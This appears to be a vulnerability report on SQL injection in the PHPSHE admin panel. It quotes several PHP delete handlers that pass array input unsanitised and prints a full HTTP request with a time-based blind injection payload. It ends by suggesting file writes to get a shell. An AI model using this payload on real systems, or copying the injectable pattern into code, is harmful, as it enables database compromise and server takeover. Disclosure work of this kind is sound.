代码拉取完成,页面将自动刷新
Look at the code
admin/user.php
case 'del':
pe_token_match();
if ($db->pe_delete('user', array('user_id'=>is_array($_p_user_id) ? $_p_user_id : intval($_g_id)))) {
pe_success('会员删除成功!');
}
else {
pe_error('会员删除失败...');
}
break;
It is found that if one is deleted at a time, intval processing will be performed. If it is deleted in batches, the statement will be directly substituted, and the payload is constructed as follows.
POST /phpshe/admin.php?mod=user&act=del&token=d52aa9e11515574f774c9da971a4ae10 HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Referer: http://www.test.com/fiyocms/
Cookie: PHPSESSID=2j08sefmgofettspbuso00fs07
Connection: keep-alive
Upgrade-Insecure-Requests: 1
checkall=on&user_id%5B%5D=2') and if(1,sleep(5),1)#

admin/userbank.php
case 'del':
pe_token_match();
$userbank_id = is_array($_p_userbank_id) ? $_p_userbank_id : $_g_id;
if ($db->pe_delete('userbank', array('userbank_id'=>$userbank_id))) {
pe_success('删除成功!');
}
else {
pe_error('删除失败...');
}
break;
admin/userlevel.php
case 'del':
pe_token_match();
$userlevel_id = is_array($_p_userlevel_id) ? $_p_userlevel_id : intval($_g_id);
if ($db->pe_delete('userlevel', array('userlevel_id'=>$userlevel_id))) {
cache_write('userlevel');
userlevel_callback();
pe_success('删除成功!');
}
else {
pe_error('删除失败...');
}
break;
admin/ad.php
case 'del':
pe_token_match();
$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
if ($db->pe_delete('ad', array('ad_id'=>$ad_id))) {
cache_write('ad');
pe_success('删除成功!');
}
else {
pe_error('删除失败...');
}
break;
//####################// 广告状态 //####################//
case 'state':
pe_token_match();
$ad_id = is_array($_p_ad_id) ? $_p_ad_id : intval($_g_id);
if ($db->pe_update('ad', array('ad_id'=>$ad_id), array('ad_state'=>$_g_state))) {
cache_write('ad');
pe_success("操作成功!");
}
else {
pe_error("操作失败...");
}
break;
//####################// 广告列表 //####################//
default :
$_g_type && $sql_where .= " and `ad_type` = '{$_g_type}'";
$_g_position && $sql_where .= " and `ad_position` = '{$_g_position}'";
$sql_where .= " order by `ad_order` asc, `ad_id` desc";
$info_list = $db->pe_selectall('ad', $sql_where, '*', array(20, $_g_page));
If there is permission in the target environment, we can read the file or write the file to getshell.
